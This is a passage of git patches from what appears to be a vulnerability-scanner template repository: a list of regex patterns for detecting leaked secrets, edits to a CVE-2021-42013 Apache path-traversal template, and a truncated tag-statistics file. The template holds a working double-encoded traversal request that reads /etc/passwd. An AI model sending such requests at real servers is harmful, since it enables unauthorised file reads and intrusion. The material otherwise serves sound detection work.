:).{1,32}" + - "(?i)client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :).{1,32}" + - "(?i)claimr[_-]?token(=| =|:| :).{1,32}" + - "(?i)claimr[_-]?superuser(=| =|:| :).{1,32}" + - "(?i)claimr[_-]?db(=| =|:| :).{1,32}" + - "(?i)claimr[_-]?database(=| =|:| :).{1,32}" + - "(?i)ci[_-]?user[_-]?token(=| =|:| :).{1,32}" + - "(?i)ci[_-]?server[_-]?name(=| =|:| :).{1,32}" + - "(?i)ci[_-]?registry[_-]?user(=| =|:| :).{1,32}" + - "(?i)ci[_-]?project[_-]?url(=| =|:| :).{1,32}" + - "(?i)ci[_-]?deploy[_-]?password(=| =|:| :).{1,32}" + - "(?i)chrome[_-]?refresh[_-]?token(=| =|:| :).{1,32}" + - "(?i)chrome[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)cheverny[_-]?token(=| =|:| :).{1,32}" + - "(?i)cf[_-]?password(=| =|:| :).{1,32}" + - "(?i)certificate[_-]?password(=| =|:| :).{1,32}" + - "(?i)censys[_-]?secret(=| =|:| :).{1,32}" + - "(?i)cattle[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :).{1,32}" + - "(?i)cattle[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)cargo[_-]?token(=| =|:| :).{1,32}" + - "(?i)cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)bx[_-]?username(=| =|:| :).{1,32}" + - "(?i)bx[_-]?password(=| =|:| :).{1,32}" + - "(?i)bundlesize[_-]?github[_-]?token(=| =|:| :).{1,32}" + - "(?i)built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :).{1,32}" + - "(?i)bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)browserstack[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)browser[_-]?stack[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?username(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?pwd(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?password(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?pass[_-]?prod(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?pass(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?auth(=| =|:| :).{1,32}" + - "(?i)bluemix[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)bintraykey(=| =|:| :).{1,32}" + - "(?i)bintray[_-]?token(=| =|:| :).{1,32}" + - "(?i)bintray[_-]?key(=| =|:| :).{1,32}" + - "(?i)bintray[_-]?gpg[_-]?password(=| =|:| :).{1,32}" + - "(?i)bintray[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)bintray[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)b2[_-]?bucket(=| =|:| :).{1,32}" + - "(?i)b2[_-]?app[_-]?key(=| =|:| :).{1,32}" + - "(?i)awssecretkey(=| =|:| :).{1,32}" + - "(?i)awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)awscn[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)awsaccesskeyid(=| =|:| :).{1,32}" + - "(?i)aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)aws[_-]?secrets(=| =|:| :).{1,32}" + - "(?i)aws[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)aws[_-]?secret(=| =|:| :).{1,32}" + - "(?i)aws[_-]?key(=| =|:| :).{1,32}" + - "(?i)aws[_-]?config[_-]?secretaccesskey(=| =|:| :).{1,32}" + - "(?i)aws[_-]?config[_-]?accesskeyid(=| =|:| :).{1,32}" + - "(?i)aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)aws[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)aws[_-]?access(=| =|:| :).{1,32}" + - "(?i)author[_-]?npm[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)author[_-]?email[_-]?addr(=| =|:| :).{1,32}" + - "(?i)auth0[_-]?client[_-]?secret(=| =|:| :).{1,32}" + - "(?i)auth0[_-]?api[_-]?clientsecret(=| =|:| :).{1,32}" + - "(?i)auth[_-]?token(=| =|:| :).{1,32}" + - "(?i)assistant[_-]?iam[_-]?apikey(=| =|:| :).{1,32}" + - "(?i)artifacts[_-]?secret(=| =|:| :).{1,32}" + - "(?i)artifacts[_-]?key(=| =|:| :).{1,32}" + - "(?i)artifacts[_-]?bucket(=| =|:| :).{1,32}" + - "(?i)artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}" + - "(?i)artifactory[_-]?key(=| =|:| :).{1,32}" + - "(?i)argos[_-]?token(=| =|:| :).{1,32}" + - "(?i)apple[_-]?id[_-]?password(=| =|:| :).{1,32}" + - "(?i)appclientsecret(=| =|:| :).{1,32}" + - "(?i)app[_-]?token(=| =|:| :).{1,32}" + - "(?i)app[_-]?secrete(=| =|:| :).{1,32}" + - "(?i)app[_-]?report[_-]?token[_-]?key(=| =|:| :).{1,32}" + - "(?i)app[_-]?bucket[_-]?perm(=| =|:| :).{1,32}" + - "(?i)apigw[_-]?access[_-]?token(=| =|:| :).{1,32}" + - "(?i)apiary[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)api[_-]?secret(=| =|:| :).{1,32}" + - "(?i)api[_-]?key[_-]?sid(=| =|:| :).{1,32}" + - "(?i)api[_-]?key[_-]?secret(=| =|:| :).{1,32}" + - "(?i)api[_-]?key(=| =|:| :).{1,32}" + - "(?i)aos[_-]?sec(=| =|:| :).{1,32}" + - "(?i)aos[_-]?key(=| =|:| :).{1,32}" + - "(?i)ansible[_-]?vault[_-]?password(=| =|:| :).{1,32}" + - "(?i)android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :).{1,32}" + - "(?i)anaconda[_-]?token(=| =|:| :).{1,32}" + - "(?i)amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)amazon[_-]?bucket[_-]?name(=| =|:| :).{1,32}" + - "(?i)alicloud[_-]?secret[_-]?key(=| =|:| :).{1,32}" + - "(?i)alicloud[_-]?access[_-]?key(=| =|:| :).{1,32}" + - "(?i)alias[_-]?pass(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?search[_-]?key[_-]?1(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?search[_-]?key(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?search[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?api[_-]?key[_-]?search(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :).{1,32}" + - "(?i)algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :).{1,32}" + - "(?i)adzerk[_-]?api[_-]?key(=| =|:| :).{1,32}" + - "(?i)admin[_-]?email(=| =|:| :).{1,32}" + - "(?i)account[_-]?sid(=| =|:| :).{1,32}" + - "(?i)access[_-]?token(=| =|:| :).{1,32}" + - "(?i)access[_-]?secret(=| =|:| :).{1,32}" + - "(?i)access[_-]?key[_-]?secret(=| =|:| :).{1,32}" From dce764380ce4bde3b51f3a9066a06b4f00418a48 Mon Sep 17 00:00:00 2001 From: Naveen Sunkavally Date: Thu, 7 Oct 2021 15:36:29 -0400 Subject: [PATCH 2777/4083] yaml typo --- cves/2021/CVE-2021-42013.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml index 926274ef16..b10eccfe5f 100644 --- a/cves/2021/CVE-2021-42013.yaml +++ b/cves/2021/CVE-2021-42013.yaml @@ -4,7 +4,7 @@ info: name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution author: nvn1729 severity: critical - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note: CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. + description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773. reference: - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 From b2fec03884d2c989f131d0a463eaab59db405c7b Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 8 Oct 2021 02:42:44 +0530 Subject: [PATCH 2778/4083] misc update --- cves/2021/CVE-2021-42013.yaml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml index b10eccfe5f..f9a621d638 100644 --- a/cves/2021/CVE-2021-42013.yaml +++ b/cves/2021/CVE-2021-42013.yaml @@ -17,7 +17,6 @@ requests: GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close unsafe: true matchers-condition: and @@ -27,11 +26,6 @@ requests: regex: - "root:.*:0:0" - - type: word - words: - - "Apache" - part: header - - type: status status: - 200 From dde8ab4c3fb2c7ffe62322c934f45da68a773078 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 7 Oct 2021 21:36:51 +0000 Subject: [PATCH 2779/4083] Auto Generated Templates Stats [Thu Oct 7 21:36:51 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1767 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 895 insertions(+), 894 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 6dc884cfcd..46b5586d34 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":814},{"name":"lfi","count":329},{"name":"panel","count":259},{"name":"xss","count":253},{"name":"wordpress","count":243},{"name":"exposure","count":237},{"name":"rce","count":202},{"name":"tech","count":193},{"name":"wp-plugin","count":168},{"name":"cve2020","count":164},{"name":"cve2021","count":147},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":87},{"name":"apache","count":71},{"name":"takeover","count":69},{"name":"iot","count":67},{"name":"token","count":66},{"name":"default-login","count":65},{"name":"token-spray","count":63},{"name":"oob","count":59},{"name":"cve2017","count":50},{"name":"file","count":48},{"name":"unauth","count":47},{"name":"network","count":43},{"name":"sqli","count":40},{"name":"ssrf","count":40},{"name":"cve2016","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"redirect","count":35},{"name":"logs","count":30},{"name":"google","count":29},{"name":"jira","count":28},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":26},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"cisco","count":22},{"name":"router","count":21},{"name":"misconfig","count":19},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"weblogic","count":14},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"devops","count":13},{"name":"adobe","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"ibm","count":8},{"name":"cnvd","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"scada","count":8},{"name":"cve2008","count":8},{"name":"backup","count":8},{"name":"ruijie","count":8},{"name":"microsoft","count":8},{"name":"nginx","count":8},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"hp","count":7},{"name":"kubernetes","count":7},{"name":"netgear","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"fileupload","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"nodejs","count":6},{"name":"django","count":6},{"name":"camera","count":6},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"jolokia","count":5},{"name":"java","count":5},{"name":"drupal","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"deserialization","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"dedecms","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"windows","count":5},{"name":"amazon","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"traversal","count":4},{"name":"webserver","count":4},{"name":"symfony","count":4},{"name":"symantec","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"magmi","count":4},{"name":"maps","count":4},{"name":"git","count":4},{"name":"thinkcmf","count":4},{"name":"thinkphp","count":4},{"name":"npm","count":4},{"name":"hongdian","count":4},{"name":"glpi","count":4},{"name":"solarwinds","count":4},{"name":"zabbix","count":4},{"name":"strapi","count":4},{"name":"elastic","count":4},{"name":"slack","count":4},{"name":"firmware","count":4},{"name":"fatpipe","count":4},{"name":"rfi","count":4},{"name":"firebase","count":4},{"name":"samsung","count":4},{"name":"zimbra","count":4},{"name":"grafana","count":4},{"name":"itop","count":3},{"name":"cacti","count":3},{"name":"opensis","count":3},{"name":"kibana","count":3},{"name":"nosqli","count":3},{"name":"smtp","count":3},{"name":"kafka","count":3},{"name":"hoteldruid","count":3},{"name":"cves","count":3},{"name":"log","count":3},{"name":"bitrix","count":3},{"name":"terramaster","count":3},{"name":"jellyfin","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"tikiwiki","count":3},{"name":"druid","count":3},{"name":"prometheus","count":3},{"name":"httpd","count":3},{"name":"fpd","count":3},{"name":"azure","count":3},{"name":"github","count":3},{"name":"mail","count":3},{"name":"lfr","count":3},{"name":"vbulletin","count":3},{"name":"node","count":3},{"name":"ebs","count":3},{"name":"linkerd","count":3},{"name":"bigip","count":3},{"name":"oa","count":3},{"name":"backdoor","count":3},{"name":"kevinlab","count":3},{"name":"telerik","count":3},{"name":"injection","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"fanruan","count":3},{"name":"search","count":3},{"name":"mongodb","count":3},{"name":"microstrategy","count":3},{"name":"cve2007","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"targa","count":3},{"name":"openam","count":3},{"name":"jeesns","count":3},{"name":"vcenter","count":2},{"name":"prtg","count":2},{"name":"rstudio","count":2},{"name":"sharepoint","count":2},{"name":"bitly","count":2},{"name":"hpe","count":2},{"name":"ilo","count":2},{"name":"payara","count":2},{"name":"dolibarr","count":2},{"name":"qcubed","count":2},{"name":"bruteforce","count":2},{"name":"hasura","count":2},{"name":"bypass","count":2},{"name":"prestashop","count":2},{"name":"keycloak","count":2},{"name":"ec2","count":2},{"name":"kentico","count":2},{"name":"mcafee","count":2},{"name":"chiyu","count":2},{"name":"glassfish","count":2},{"name":"s3","count":2},{"name":"shellshock","count":2},{"name":"tidb","count":2},{"name":"linux","count":2},{"name":"webcam","count":2},{"name":"mida","count":2},{"name":"activemq","count":2},{"name":"jsf","count":2},{"name":"pega","count":2},{"name":"globalprotect","count":2},{"name":"nextcloud","count":2},{"name":"vrealize","count":2},{"name":"waf","count":2},{"name":"harbor","count":2},{"name":"nagios","count":2},{"name":"geowebserver","count":2},{"name":"xxljob","count":2},{"name":"spark","count":2},{"name":"saltstack","count":2},{"name":"maian","count":2},{"name":"akamai","count":2},{"name":"grav","count":2},{"name":"netis","count":2},{"name":"flir","count":2},{"name":"openfire","count":2},{"name":"avantfax","count":2},{"name":"bucket","count":2},{"name":"text","count":2},{"name":"heroku","count":2},{"name":"huawei","count":2},{"name":"axis2","count":2},{"name":"splunk","count":2},{"name":"db","count":2},{"name":"rockmongo","count":2},{"name":"oauth","count":2},{"name":"chamilo","count":2},{"name":"akkadian","count":2},{"name":"kong","count":2},{"name":"couchdb","count":2},{"name":"aruba","count":2},{"name":"emerge","count":2},{"name":"commax","count":2},{"name":"odoo","count":2},{"name":"fortios","count":2},{"name":"dos","count":2},{"name":"service","count":2},{"name":"icewarp","count":2},{"name":"middleware","count":2},{"name":"natshell","count":2},{"name":"nextjs","count":2},{"name":"igs","count":2},{"name":"status","count":2},{"name":"storage","count":2},{"name":"ucmdb","count":2},{"name":"minio","count":2},{"name":"openvpn","count":2},{"name":"getsimple","count":2},{"name":"jboss","count":2},{"name":"upload","count":2},{"name":"embed","count":2},{"name":"wordfence","count":2},{"name":"trixbox","count":2},{"name":"showdoc","count":2},{"name":"cache","count":2},{"name":"netsweeper","count":2},{"name":"paloalto","count":2},{"name":"hjtcloud","count":2},{"name":"axis","count":2},{"name":"phpcollab","count":2},{"name":"backups","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"qihang","count":2},{"name":"yii","count":2},{"name":"aviatrix","count":2},{"name":"favicon","count":2},{"name":"jeedom","count":2},{"name":"sonicwall","count":2},{"name":"horde","count":2},{"name":"cve2005","count":2},{"name":"frp","count":2},{"name":"seeyon","count":2},{"name":"guacamole","count":2},{"name":"sitecore","count":2},{"name":"chyrp","count":2},{"name":"adminer","count":2},{"name":"enumeration","count":2},{"name":"plesk","count":2},{"name":"hostheader-injection","count":2},{"name":"mailchimp","count":2},{"name":"wuzhicms","count":2},{"name":"sonarqube","count":2},{"name":"idrac","count":2},{"name":"totemomail","count":2},{"name":"voipmonitor","count":2},{"name":"places","count":2},{"name":"liferay","count":2},{"name":"ecology","count":2},{"name":"leak","count":2},{"name":"smb","count":2},{"name":"hashicorp","count":2},{"name":"zyxel","count":1},{"name":"tensorflow","count":1},{"name":"pgadmin","count":1},{"name":"viewlinc","count":1},{"name":"csod","count":1},{"name":"panasonic","count":1},{"name":"gateone","count":1},{"name":"craftcms","count":1},{"name":"dvr","count":1},{"name":"wiki","count":1},{"name":"shopware","count":1},{"name":"spidercontrol","count":1},{"name":"maccmsv10","count":1},{"name":"smartblog","count":1},{"name":"qsan","count":1},{"name":"tenda","count":1},{"name":"netdata","count":1},{"name":"bedita","count":1},{"name":"matrix","count":1},{"name":"emby","count":1},{"name":"myvuehelp","count":1},{"name":"ssltls","count":1},{"name":"directions","count":1},{"name":"spip","count":1},{"name":"weglot","count":1},{"name":"phpwiki","count":1},{"name":"openrestry","count":1},{"name":"concrete","count":1},{"name":"locations","count":1},{"name":"panos","count":1},{"name":"mapbox","count":1},{"name":"goahead","count":1},{"name":"bash","count":1},{"name":"cors","count":1},{"name":"sceditor","count":1},{"name":"octoprint","count":1},{"name":"tugboat","count":1},{"name":"cocoon","count":1},{"name":"nc2","count":1},{"name":"twitter","count":1},{"name":"distance","count":1},{"name":"plugin","count":1},{"name":"memcached","count":1},{"name":"openx","count":1},{"name":"klog","count":1},{"name":"skywalking","count":1},{"name":"qdpm","count":1},{"name":"ewebs","count":1},{"name":"hiawatha","count":1},{"name":"gunicorn","count":1},{"name":"razor","count":1},{"name":"bing","count":1},{"name":"rhymix","count":1},{"name":"zarafa","count":1},{"name":"st","count":1},{"name":"oidc","count":1},{"name":"darkstat","count":1},{"name":"wazuh","count":1},{"name":"ognl","count":1},{"name":"cse","count":1},{"name":"mantisbt","count":1},{"name":"javascript","count":1},{"name":"sql","count":1},{"name":"omi","count":1},{"name":"qvisdvr","count":1},{"name":"krweb","count":1},{"name":"svn","count":1},{"name":"rmc","count":1},{"name":"panabit","count":1},{"name":"froxlor","count":1},{"name":"dom","count":1},{"name":"spring","count":1},{"name":"clickhouse","count":1},{"name":"sentry","count":1},{"name":"setup","count":1},{"name":"jfrog","count":1},{"name":"kindeditor","count":1},{"name":"szhe","count":1},{"name":"visualstudio","count":1},{"name":"stripe","count":1},{"name":"graphite","count":1},{"name":"avalanche","count":1},{"name":"ueditor","count":1},{"name":"dvwa","count":1},{"name":"xampp","count":1},{"name":"opm","count":1},{"name":"phpunit","count":1},{"name":"opensns","count":1},{"name":"owasp","count":1},{"name":"jaspersoft","count":1},{"name":"circleci","count":1},{"name":"wing-ftp","count":1},{"name":"csrf","count":1},{"name":"yachtcontrol","count":1},{"name":"fortinet","count":1},{"name":"tpshop","count":1},{"name":"mirai","count":1},{"name":"okiko","count":1},{"name":"rujjie","count":1},{"name":"api-manager","count":1},{"name":"asana","count":1},{"name":"visualtools","count":1},{"name":"exacqvision","count":1},{"name":"javamelody","count":1},{"name":"weather","count":1},{"name":"nearby","count":1},{"name":"clockwatch","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"totaljs","count":1},{"name":"pyramid","count":1},{"name":"pcoip","count":1},{"name":"processmaker","count":1},{"name":"nordex","count":1},{"name":"weiphp","count":1},{"name":"sprintful","count":1},{"name":"solman","count":1},{"name":"mariadb","count":1},{"name":"erp-nc","count":1},{"name":"netrc","count":1},{"name":"labtech","count":1},{"name":"synnefo","count":1},{"name":"daybyday","count":1},{"name":"geolocation","count":1},{"name":"okta","count":1},{"name":"wifisky","count":1},{"name":"idemia","count":1},{"name":"zmanda","count":1},{"name":"extractor","count":1},{"name":"remkon","count":1},{"name":"square","count":1},{"name":"newrelic","count":1},{"name":"xiuno","count":1},{"name":"anchorcms","count":1},{"name":"hubspot","count":1},{"name":"couchbase","count":1},{"name":"werkzeug","count":1},{"name":"fortigates","count":1},{"name":"postmessage","count":1},{"name":"cerebro","count":1},{"name":"ruby","count":1},{"name":"place","count":1},{"name":"fuelcms","count":1},{"name":"netgenie","count":1},{"name":"plastic","count":1},{"name":"mrtg","count":1},{"name":"lancom","count":1},{"name":"optiLink","count":1},{"name":"wavemaker","count":1},{"name":"sangfor","count":1},{"name":"karel","count":1},{"name":"moinmoin","count":1},{"name":"expose","count":1},{"name":"magicflow","count":1},{"name":"tika","count":1},{"name":"cve2006","count":1},{"name":"dnssec","count":1},{"name":"xmlchart","count":1},{"name":"motorola","count":1},{"name":"ipstack","count":1},{"name":"calendly","count":1},{"name":"opencast","count":1},{"name":"monitorix","count":1},{"name":"shopizer","count":1},{"name":"gotmls","count":1},{"name":"chinaunicom","count":1},{"name":"influxdb","count":1},{"name":"nerdgraph","count":1},{"name":"blue-ocean","count":1},{"name":"nuuo","count":1},{"name":"shoretel","count":1},{"name":"gogs","count":1},{"name":"proftpd","count":1},{"name":"glowroot","count":1},{"name":"domxss","count":1},{"name":"interlib","count":1},{"name":"postgres","count":1},{"name":"traefik","count":1},{"name":"cobub","count":1},{"name":"kubeflow","count":1},{"name":"sgp","count":1},{"name":"zenario","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"socomec","count":1},{"name":"calendarix","count":1},{"name":"iceflow","count":1},{"name":"actuator","count":1},{"name":"dotclear","count":1},{"name":"tracer","count":1},{"name":"nette","count":1},{"name":"nedi","count":1},{"name":"lotus","count":1},{"name":"feifeicms","count":1},{"name":"route","count":1},{"name":"keenetic","count":1},{"name":"rockethchat","count":1},{"name":"clockwork","count":1},{"name":"discourse","count":1},{"name":"nimble","count":1},{"name":"openweather","count":1},{"name":"simplecrm","count":1},{"name":"gstorage","count":1},{"name":"nexusdb","count":1},{"name":"jenkin","count":1},{"name":"websphere","count":1},{"name":"adb","count":1},{"name":"servicedesk","count":1},{"name":"tinypng","count":1},{"name":"glances","count":1},{"name":"zend","count":1},{"name":"sage","count":1},{"name":"landrayoa","count":1},{"name":"circle","count":1},{"name":"yealink","count":1},{"name":"commscope","count":1},{"name":"tcexam","count":1},{"name":"springframework","count":1},{"name":"ghost","count":1},{"name":"javafaces","count":1},{"name":"jquery","count":1},{"name":"codemeter","count":1},{"name":"diris","count":1},{"name":"zcms","count":1},{"name":"iterable","count":1},{"name":"servicenow","count":1},{"name":"redhat","count":1},{"name":"zzzcms","count":1},{"name":"natemail","count":1},{"name":"wooyun","count":1},{"name":"shopxo","count":1},{"name":"apos","count":1},{"name":"raspap","count":1},{"name":"nweb2fax","count":1},{"name":"sonarcloud","count":1},{"name":"buttercms","count":1},{"name":"zm","count":1},{"name":"phpfastcache","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"artica","count":1},{"name":"lokalise","count":1},{"name":"opentsdb","count":1},{"name":"ricoh","count":1},{"name":"node-red-dashboard","count":1},{"name":"wavlink","count":1},{"name":"resourcespace","count":1},{"name":"eyou","count":1},{"name":"mailgun","count":1},{"name":"elevation","count":1},{"name":"tapestry","count":1},{"name":"zeroshell","count":1},{"name":"rabbitmq","count":1},{"name":"mpsec","count":1},{"name":"pulsesecure","count":1},{"name":"plc","count":1},{"name":"nsasg","count":1},{"name":"tensorboard","count":1},{"name":"basic-auth","count":1},{"name":"default","count":1},{"name":"graphql","count":1},{"name":"graylog","count":1},{"name":"saltapi","count":1},{"name":"loqate","count":1},{"name":"gridx","count":1},{"name":"redmine","count":1},{"name":"acexy","count":1},{"name":"axiom","count":1},{"name":"timezone","count":1},{"name":"wildfly","count":1},{"name":"owa","count":1},{"name":"olivetti","count":1},{"name":"livezilla","count":1},{"name":"cyberoam","count":1},{"name":"acontent","count":1},{"name":"trane","count":1},{"name":"appweb","count":1},{"name":"grails","count":1},{"name":"lighttpd","count":1},{"name":"k8","count":1},{"name":"openstack","count":1},{"name":"placeos","count":1},{"name":"rocketchat","count":1},{"name":"smartsense","count":1},{"name":"jenzabar","count":1},{"name":"centos","count":1},{"name":"phpshowtime","count":1},{"name":"jeewms","count":1},{"name":"ntopng","count":1},{"name":"powercreator","count":1},{"name":"timeclock","count":1},{"name":"metabase","count":1},{"name":"cherokee","count":1},{"name":"sureline","count":1},{"name":"xml","count":1},{"name":"fedora","count":1},{"name":"solarlog","count":1},{"name":"cloudflare","count":1},{"name":"beanstalk","count":1},{"name":"find","count":1},{"name":"nifi","count":1},{"name":"duomicms","count":1},{"name":"csrfguard","count":1},{"name":"huijietong","count":1},{"name":"contentkeeper","count":1},{"name":"uwsgi","count":1},{"name":"triconsole","count":1},{"name":"seacms","count":1},{"name":"rsyncd","count":1},{"name":"haproxy","count":1},{"name":"vidyo","count":1},{"name":"swagger","count":1},{"name":"wakatime","count":1},{"name":"mysql","count":1},{"name":"circontrorl","count":1},{"name":"timesheet","count":1},{"name":"ssl","count":1},{"name":"gespage","count":1},{"name":"alibaba","count":1},{"name":"portainer","count":1},{"name":"etouch","count":1},{"name":"robomongo","count":1},{"name":"webui","count":1},{"name":"monitorr","count":1},{"name":"wondercms","count":1},{"name":"cloudron","count":1},{"name":"testrail","count":1},{"name":"sar2html","count":1},{"name":"accela","count":1},{"name":"circontrol","count":1},{"name":"stem","count":1},{"name":"esmtp","count":1},{"name":"oneblog","count":1},{"name":"fortilogger","count":1},{"name":"acme","count":1},{"name":"k8s","count":1},{"name":"discord","count":1},{"name":"pihole","count":1},{"name":"scs","count":1},{"name":"asus","count":1},{"name":"pivotaltracker","count":1},{"name":"ilo4","count":1},{"name":"upnp","count":1},{"name":"imap","count":1},{"name":"novnc","count":1},{"name":"aspnuke","count":1},{"name":"xdcms","count":1},{"name":"cloudinary","count":1},{"name":"phpinfo","count":1},{"name":"mongo","count":1},{"name":"youtube","count":1},{"name":"buildkite","count":1},{"name":"etherpad","count":1},{"name":"cgi","count":1},{"name":"logontracer","count":1},{"name":"selea","count":1},{"name":"minimouse","count":1},{"name":"sco","count":1},{"name":"lansweeper","count":1},{"name":"tongda","count":1},{"name":"thinkadmin","count":1},{"name":"limit","c